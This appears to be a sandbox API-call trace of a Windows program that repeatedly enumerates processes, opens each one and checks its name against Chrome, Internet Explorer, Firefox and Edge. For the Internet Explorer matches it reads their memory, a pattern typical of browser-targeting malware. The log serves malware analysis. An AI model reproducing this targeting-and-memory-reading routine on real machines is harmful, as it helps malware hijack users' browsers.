	[0212.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3e40
	[0212.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.670] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.671] NtQueryInformationProcess (in: ProcessHandle=0x3e40, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.671] ReadProcessMemory (in: hProcess=0x3e40, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.671] ReadProcessMemory (in: hProcess=0x3e40, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.671] ReadProcessMemory (in: hProcess=0x3e40, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.671] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0212.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3e44
	[0212.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.672] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0212.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.672] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0212.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.672] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0212.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.673] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.673] NtQueryInformationProcess (in: ProcessHandle=0x3e44, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0212.673] ReadProcessMemory (in: hProcess=0x3e44, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0212.673] ReadProcessMemory (in: hProcess=0x3e44, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0212.673] ReadProcessMemory (in: hProcess=0x3e44, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0212.673] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0212.673] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x3e48
	[0212.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.674] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.674] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.675] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.675] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.676] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0212.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3e4c
	[0212.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.676] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0212.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.677] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.677] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0212.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.677] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.678] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3e50
	[0212.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.678] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.679] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.681] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3e54
	[0212.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.681] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.681] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.682] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.682] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0212.683] CloseHandle (hObject=0x188) returned 1
	[0212.683] Sleep (dwMilliseconds=0x64) 
	[0212.785] GetCurrentProcessId () returned 0x110
	[0212.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0212.789] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0212.790] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0212.791] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0212.792] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x3e58
	[0212.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.792] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.793] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.793] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.793] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.794] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3e5c
	[0212.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.795] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.795] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.796] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.796] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.796] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0212.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3e60
	[0212.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.798] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0212.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.798] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.799] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0212.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.799] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.799] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0212.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3e64
	[0212.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.801] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0212.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.802] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.802] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0212.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.802] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0212.804] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3e68
	[0212.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.804] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0212.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.804] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.805] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0212.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.805] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.806] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0212.806] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3e6c
	[0212.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.807] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0212.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.807] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.808] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0212.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.808] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.808] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0212.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3e70
	[0212.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.810] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0212.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.810] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.810] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0212.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.811] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.811] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0212.812] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3e74
	[0212.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.812] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.813] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.813] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.813] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.814] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.814] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3e78
	[0212.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.815] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.815] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.816] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.817] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.817] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.818] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3e7c
	[0212.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.818] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.818] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.819] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.819] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.819] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.820] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3e80
	[0212.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.821] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.821] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.821] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.822] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.822] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3e84
	[0212.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.823] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.823] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.824] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.824] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.825] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3e88
	[0212.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.826] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.826] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.826] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.827] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.827] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.828] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3e8c
	[0212.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.828] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.829] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.829] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.829] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.830] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.830] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3e90
	[0212.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.834] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.835] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.835] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.836] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.836] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0212.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3e94
	[0212.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.838] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0212.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.839] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.839] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0212.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.839] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
